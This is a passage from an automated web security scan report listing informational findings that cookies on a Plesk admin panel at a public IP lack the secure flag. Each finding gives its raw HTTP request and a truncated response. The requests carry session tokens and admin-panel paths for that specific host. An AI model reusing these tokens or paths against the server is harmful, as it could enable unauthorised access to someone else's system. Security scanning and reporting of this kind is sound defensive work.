P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: phpMyAdmin=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: locale=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:33:16 GMT
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

4.76. https://50.22.21.242:8443/plesk/actionlog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/actionlog/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/actionlog/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:50 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:49 GMT
Content-Length: 36371

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.77. https://50.22.21.242:8443/plesk/admin-alias@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin-alias@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-alias@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fadmin-alias%40%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:43:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:43:34 GMT
Connection: close
Content-Length: 18133

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.78. https://50.22.21.242:8443/plesk/admin-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:53:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=credentials-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:53:30 GMT
Connection: close
Content-Length: 29374

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.79. https://50.22.21.242:8443/plesk/admin-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin-password/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-password/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:53:28 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=credentials-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:53:28 GMT
Connection: close
Content-Length: 18267

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.80. https://50.22.21.242:8443/plesk/admin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:39:01 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:39:02 GMT
Connection: close
Content-Length: 20533

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.81. https://50.22.21.242:8443/plesk/admin/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin/report/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: admin_report__report_id=2; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:00:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: admin_report__report_id=2
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:00:15 GMT
Content-Length: 25591

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.82. https://50.22.21.242:8443/plesk/admin/report/traffic-history/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin/report/traffic-history/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin/report/traffic-history/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:07:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:07:45 GMT
Connection: close
Content-Length: 13640

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.83. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/create/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/create/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/create/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:52 GMT
Content-Length: 18301

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.84. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/ftp-repository/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/ftp-repository/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:33 GMT
Connection: close
Content-Length: 21612

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.85. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/ftp-repository/properties/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:54:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=personal-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:54:12 GMT
Connection: close
Content-Length: 17353

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.86. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:38 GMT
Content-Length: 21529

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.87. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:28 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.88. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:47 GMT
Connection: close
Content-Length: 13756

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.89. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
